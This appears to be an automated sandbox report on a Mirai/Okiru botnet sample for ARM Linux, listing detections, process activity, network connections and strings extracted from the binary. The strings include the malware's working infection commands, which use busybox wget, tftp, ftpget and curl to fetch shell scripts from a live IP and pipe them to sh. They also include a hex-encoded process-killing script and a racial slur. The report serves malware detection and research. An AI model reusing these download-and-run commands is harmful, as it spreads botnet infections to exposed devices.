Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
arm5.nn-20241218-0633.elf

Overview

General Information

Sample name:arm5.nn-20241218-0633.elf
Analysis ID:1577153
MD5:22ad871042ce032b7225a4f11f1d3f86
SHA1:f68d2d02fb6df23061174bd38324d8895a73ddbe
SHA256:1daa64d77d6383023899ac2eeeb00fe93ed821cdfcf01bf829c3ed5fe2e20bf5
Tags:user-elfdigest
Infos:

Detection

Mirai, Okiru
Score:76
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mirai
Yara detected Okiru
Sample deletes itself
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1577153
Start date and time:2024-12-18 07:36:39 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 34s
Hypervisor based Inspection enabled:false
Report type:light
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:arm5.nn-20241218-0633.elf
Detection:MAL
Classification:mal76.troj.evad.linELF@0/2@0/0
  • Report size exceeded maximum capacity and may have missing network information.
  • TCP Packets have been reduced to 100
Command:/tmp/arm5.nn-20241218-0633.elf
PID:6208
Exit Code:139
Exit Code Info:SIGSEGV (11) Segmentation fault invalid memory reference
Killed:False
Standard Output:

Standard Error:qemu: uncaught target signal 11 (Segmentation fault) - core dumped
  • system is lnxubuntu20
  • dash New Fork (PID: 6195, Parent: 4334)
  • rm (PID: 6195, Parent: 4334, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.2Vk4GHUvv3 /tmp/tmp.AyMCUiGuNP /tmp/tmp.0eZyUHHcgu
  • dash New Fork (PID: 6196, Parent: 4334)
  • rm (PID: 6196, Parent: 4334, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.2Vk4GHUvv3 /tmp/tmp.AyMCUiGuNP /tmp/tmp.0eZyUHHcgu
  • udisksd New Fork (PID: 6219, Parent: 799)
  • dumpe2fs (PID: 6219, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6298, Parent: 799)
  • dumpe2fs (PID: 6298, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6299, Parent: 799)
  • dumpe2fs (PID: 6299, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • sh (PID: 6331, Parent: 1477, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
  • gsd-housekeeping (PID: 6331, Parent: 1477, MD5: b55f3394a84976ddb92a2915e5d76914) Arguments: /usr/libexec/gsd-housekeeping
  • udisksd New Fork (PID: 6332, Parent: 799)
  • dumpe2fs (PID: 6332, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6336, Parent: 799)
  • dumpe2fs (PID: 6336, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
arm5.nn-20241218-0633.elfJoeSecurity_OkiruYara detected OkiruJoe Security
    arm5.nn-20241218-0633.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      SourceRuleDescriptionAuthorStrings
      6208.1.00007fe574017000.00007fe574031000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
        6208.1.00007fe574017000.00007fe574031000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          Process Memory Space: arm5.nn-20241218-0633.elf PID: 6208JoeSecurity_OkiruYara detected OkiruJoe Security
            No Suricata rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: arm5.nn-20241218-0633.elfAvira: detected
            Source: arm5.nn-20241218-0633.elfVirustotal: Detection: 36%Perma Link
            Source: arm5.nn-20241218-0633.elfReversingLabs: Detection: 47%
            Source: arm5.nn-20241218-0633.elfString: getinfo xxxTSource Engine QueryNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe..%s/%s/proc//data/local/tmp//var/run/home/usr/bin/dev/dev/mnt/var/tmptmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/shFound And Killed Process: PID=%d, Realpath=%s487154914<146<2surf2/proc/%d/exe/ /./fd/socket/proc/%d/mountinfo/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpythoniptablesnanonvimvimgdbpkillkillallapt/bin/login94.156.227.234malloc[start_pid_hopping] Failed to clone: %s
            Source: arm5.nn-20241218-0633.elfString: incorrectinvalidbadwrongfaildeniederrorretryenableshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;/bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;/bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;curl http://94.156.227.233/curl.sh -o- | sh94.156.227.233GET /dlr. HTTP/1.0
            Source: global trafficTCP traffic: 192.168.2.23:60004 -> 94.156.227.234:38242
            Source: global trafficTCP traffic: 192.168.2.23:38984 -> 154.216.19.139:199
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6208)Socket: 0.0.0.0:38242
            Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
            Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
            Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
            Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
            Source: unknownTCP traffic detected without corresponding DNS query: 35.66.122.149
            Source: unknownTCP traffic detected without corresponding DNS query: 99.150.118.215
            Source: unknownTCP traffic detected without corresponding DNS query: 86.127.229.186
            Source: unknownTCP traffic detected without corresponding DNS query: 3.40.78.144
            Source: unknownTCP traffic detected without corresponding DNS query: 189.56.160.159
            Source: unknownTCP traffic detected without corresponding DNS query: 105.160.132.68
            Source: unknownTCP traffic detected without corresponding DNS query: 2.169.136.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.52.149.113
            Source: unknownTCP traffic detected without corresponding DNS query: 61.225.6.238
            Source: unknownTCP traffic detected without corresponding DNS query: 83.46.38.208
            Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
            Source: unknownTCP traffic detected without corresponding DNS query: 47.32.224.73
            Source: unknownTCP traffic detected without corresponding DNS query: 151.160.49.197
            Source: unknownTCP traffic detected without corresponding DNS query: 62.248.23.59
            Source: unknownTCP traffic detected without corresponding DNS query: 109.226.127.100
            Source: unknownTCP traffic detected without corresponding DNS query: 112.209.69.234
            Source: unknownTCP traffic detected without corresponding DNS query: 50.30.76.172
            Source: unknownTCP traffic detected without corresponding DNS query: 53.223.207.183
            Source: unknownTCP traffic detected without corresponding DNS query: 211.61.85.120
            Source: unknownTCP traffic detected without corresponding DNS query: 189.230.121.152
            Source: unknownTCP traffic detected without corresponding DNS query: 56.203.8.134
            Source: unknownTCP traffic detected without corresponding DNS query: 203.16.172.246
            Source: unknownTCP traffic detected without corresponding DNS query: 68.63.161.215
            Source: unknownTCP traffic detected without corresponding DNS query: 155.181.154.10
            Source: unknownTCP traffic detected without corresponding DNS query: 133.73.42.97
            Source: unknownTCP traffic detected without corresponding DNS query: 1.191.54.203
            Source: unknownTCP traffic detected without corresponding DNS query: 5.79.150.34
            Source: unknownTCP traffic detected without corresponding DNS query: 93.32.85.212
            Source: unknownTCP traffic detected without corresponding DNS query: 40.87.83.172
            Source: unknownTCP traffic detected without corresponding DNS query: 215.184.182.92
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
            Source: unknownTCP traffic detected without corresponding DNS query: 35.66.122.149
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
            Source: unknownTCP traffic detected without corresponding DNS query: 53.63.103.104
            Source: unknownTCP traffic detected without corresponding DNS query: 2.214.26.236
            Source: unknownTCP traffic detected without corresponding DNS query: 172.184.53.11
            Source: unknownTCP traffic detected without corresponding DNS query: 6.109.155.200
            Source: unknownTCP traffic detected without corresponding DNS query: 190.89.149.23
            Source: unknownTCP traffic detected without corresponding DNS query: 119.108.24.247
            Source: unknownTCP traffic detected without corresponding DNS query: 99.150.118.215
            Source: unknownTCP traffic detected without corresponding DNS query: 135.212.53.41
            Source: unknownTCP traffic detected without corresponding DNS query: 34.219.206.237
            Source: unknownTCP traffic detected without corresponding DNS query: 50.36.117.21
            Source: unknownTCP traffic detected without corresponding DNS query: 186.75.203.110
            Source: unknownTCP traffic detected without corresponding DNS query: 204.184.19.14
            Source: unknownTCP traffic detected without corresponding DNS query: 143.91.117.105
            Source: unknownTCP traffic detected without corresponding DNS query: 159.129.114.210
            Source: unknownTCP traffic detected without corresponding DNS query: 182.83.41.0
            Source: arm5.nn-20241218-0633.elfString found in binary or memory: http://94.156.227.233/
            Source: arm5.nn-20241218-0633.elfString found in binary or memory: http://94.156.227.233/curl.sh
            Source: arm5.nn-20241218-0633.elfString found in binary or memory: http://94.156.227.233/lol.sh
            Source: arm5.nn-20241218-0633.elfString found in binary or memory: http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s
            Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
            Source: Initial sampleString containing 'busybox' found: /bin/busybox
            Source: Initial sampleString containing 'busybox' found: getinfo xxxTSource Engine QueryNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe..%s/%s/proc//data/local/tmp//var/run/home/usr/bin/dev/dev/mnt/var/tmptmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/shFound And Killed Process: PID=%d, Realpath=%s487154914<146<2surf2/proc/%d/exe/ /./fd/socket/proc/%d/mountinfo/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahi
            Source: Initial sampleString containing 'busybox' found: usage: busybox
            Source: Initial sampleString containing 'busybox' found: /bin/busybox hostname PBOC
            Source: Initial sampleString containing 'busybox' found: /bin/busybox echo >
            Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne
            Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;
            Source: Initial sampleString containing 'busybox' found: /bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;
            Source: Initial sampleString containing 'busybox' found: /bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;
            Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
            Source: Initial sampleString containing 'busybox' found: incorrectinvalidbadwrongfaildeniederrorretryenableshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;/bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;/bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;curl http://94.156.227.233/curl.sh -o- | sh94.156.227.233GET /dlr. HTTP/1.0
            Source: Initial sampleString containing 'busybox' found: > .d/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrepThe Gorilla/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4T
            Source: ELF static info symbol of initial sample.symtab present: no
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6238)SIGKILL sent: pid: 788, result: successful
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6238)SIGKILL sent: pid: 884, result: successful
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6238)SIGKILL sent: pid: 1664, result: successful
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6238)SIGKILL sent: pid: 2096, result: successful
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6238)SIGKILL sent: pid: 2102, result: successful
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6238)SIGKILL sent: pid: 6301, result: successful
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6238)SIGKILL sent: pid: 6331, result: successful
            Source: classification engineClassification label: mal76.troj.evad.linELF@0/2@0/0
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)File opened: /proc/6298/status
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)File opened: /proc/6034/cmdline
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)File opened: /proc/6331/status
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)File opened: /proc/6311/status
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)File opened: /proc/6377/status
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)File opened: /proc/6299/status
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)File opened: /proc/6310/status
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)File opened: /proc/6376/status
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)File opened: /proc/6379/status
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)File opened: /proc/6312/status
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)File opened: /proc/6378/status
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)File opened: /proc/6391/status
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)File opened: /proc/6390/status
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)File opened: /proc/6392/status
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)File opened: /proc/1477/cmdline
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)File opened: /proc/799/cmdline
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)File opened: /proc/6304/status
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)File opened: /proc/6303/status
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)File opened: /proc/6306/status
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)File opened: /proc/6305/status
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)File opened: /proc/6308/status
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)File opened: /proc/6307/status
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)File opened: /proc/6309/status
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)File opened: /proc/6384/status
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)File opened: /proc/6383/status
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)File opened: /proc/6386/status
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)File opened: /proc/6385/status
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)File opened: /proc/6300/status
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)File opened: /proc/6388/status
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)File opened: /proc/6387/status
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)File opened: /proc/6302/status
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)File opened: /proc/6301/status
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)File opened: /proc/6389/status
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)File opened: /proc/6380/status
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)File opened: /proc/6382/status
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)File opened: /proc/6381/status
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)File opened: /proc/1/cmdline
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)File opened: /proc/6336/status
            Source: /usr/bin/dash (PID: 6195)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.2Vk4GHUvv3 /tmp/tmp.AyMCUiGuNP /tmp/tmp.0eZyUHHcgu
            Source: /usr/bin/dash (PID: 6196)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.2Vk4GHUvv3 /tmp/tmp.AyMCUiGuNP /tmp/tmp.0eZyUHHcgu

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6208)File: /tmp/arm5.nn-20241218-0633.elfJump to behavior
            Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6208)Queries kernel information via 'uname':
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: 1/usr/bin/x86_64-linux-gnu-c++filt!/usr/bin/sha256sum1/usr/bin/ssh-import-id-lp0!/usr/bin/qemu-ppc64!/usr/bin/xsp41/usr/bin/twist3/arm/sr10!/usr/bin/piconv0!/usr/bin/xsetroot!/usr/bin/POST/arm/usr!/usr/bin/byobu-statussr1/usr/bin/vmware-vmblock-fuse
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/qemu-microblazeel
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: U/arm/10!/usr/bin/sswap01/usr/bin/vmware-vgauth-cmd`!/usr/bin/foo2zjs1
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sparc32plus
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/qemu-riscv32
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips64el
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: !/usr/bin/[0!/usr/bin/fwupdagent1/usr/bin/qemu-mips64el10!/usr/bin/script0!/usr/bin/readlink1/usr/bin/sg_emc_trespass
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /arm/usr/bin/qemu-microblazeel
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: !/usr/bin/busctl0!/usr/bin/preunzip1/usr/bin/vmware-hgfsclient0!/usr/bin/infobrowser!/usr/bin/setterm1/usr/bin/l2ping/arm/sr10!/usr/bin/byobu-layout!/usr/bin/bzcat!/usr/bin/sg_rmsnarm/usr1/usr/bin/kill/arm/sr10!/usr/bin/fuser01/usr/bin/showconsolefont`!/usr/bin/macpack1
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/vmtoolsd
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: U1/usr/bin/systemd-escape/bin/ed0!/usr/bin/qemu-or1k!/usr/bin/colormgr
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/qemu-alpha
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/qemu-s390x
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sh4eb
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/vmware-hgfsclient
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: U/arm/sr10 /usr/bin/lessecho!/usr/bin/ucs2any1/usr/bin/poff/arm/sr10!/usr/bin/pdb3.80!/usr/bin/koi8rxterm1/usr/bin/setupconrm/sr10!/usr/bin/lowriter!/usr/bin/qemu-riscv321/usr/bin/aproposarm/sr10!/usr/bin/mkfontscale!/usr/bin/jsondiff1/usr/bin/xfce4-screensaver-command!/usr/bin/xfce4-dict!/usr/bin/man-recode1/usr/bin/xfce4-screenshooter
            Source: arm5.nn-20241218-0633.elf, 6208.1.00007ffe1f4cf000.00007ffe1f4f0000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: U/arm/sr10 /usr/bin/alsamixer!/usr/bin/pinentry-x111/usr/bin/sg_syncarm/10!/usr/bin/ps2txt0!/usr/bin/sg_prevent!/usr/bin/vmware-checkvmQ
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: U/arm/sr10 /usr/bin/scanimage!/usr/bin/menulibre1/usr/bin/foo2lava-wrapper0!/usr/bin/ipcs0!/usr/bin/fold1/usr/bin/zdiff/arm/sr10!/usr/bin/dtd2rng!/usr/bin/permview1/usr/bin/sg_senddiagsr10!/usr/bin/qemu-xtensaeb!/usr/bin/ppdc!/usr/bin/perlivparm/usr!/usr/bin/wall/arm/usr1/usr/bin/x86_64-linux-gnu-ld.gold
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/qemu-aarch64
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: P0/usr/bin/blueman-assistant`!/usr/bin/lzmore!/usr/bin/racc2.7arm/usr1/usr/bin/xfce4-popup-notes0!/usr/bin/inxi!/usr/bin/monodocs2htmlr1/usr/bin/gnome-extensions0!/usr/bin/glxdemo!/usr/bin/lzcmp/arm/usr1/usr/bin/gst-launch-1.00!/usr/bin/xflock4!/usr/bin/pkactionrm/usr1/usr/bin/systemd-cat0!/usr/bin/vimdiff!/usr/bin/qemu-ppcrm/usr1/usr/bin/btrfs-select-super0!/usr/bin/bunzip2!/usr/bin/listresarm/usr1/usr/bin/gipddecode/0!/usr/bin/pod2text!/usr/bin/xzfgreparm/usr1/usr/bin/git-upload-archive01/usr/bin/gnome-session-quit
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sh4
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: !/usr/bin/spd-say!/usr/bin/psfgettable1/usr/bin/debconf-apt-progress0!/usr/bin/transset!/usr/bin/expr!/usr/bin/pdfdetachm/usr1/usr/bin/lightdm-gtk-greeter-settings!/usr/bin/col701/usr/bin/vmware-xferlogs`!/usr/bin/byobu-screen1/usr/bin/byobu-launchsr10!/usr/bin/loimpress!/usr/bin/print1 @
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /arm/usr/bin/vmware-vmblock-fuse
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/qemu-nios2
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm/var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-llmWagq
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/qemu-microblaze
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: !/usr/bin/sort1/usr/bin/rtstat/arm/sr10!/usr/bin/bash0!/usr/bin/x11perf1/usr/bin/update-mime-database0!/usr/bin/py3clean!/usr/bin/vmhgfs-fuse1/usr/bin/enchant-lsmod-2
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/qemu-cris
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/qemu-ppc64
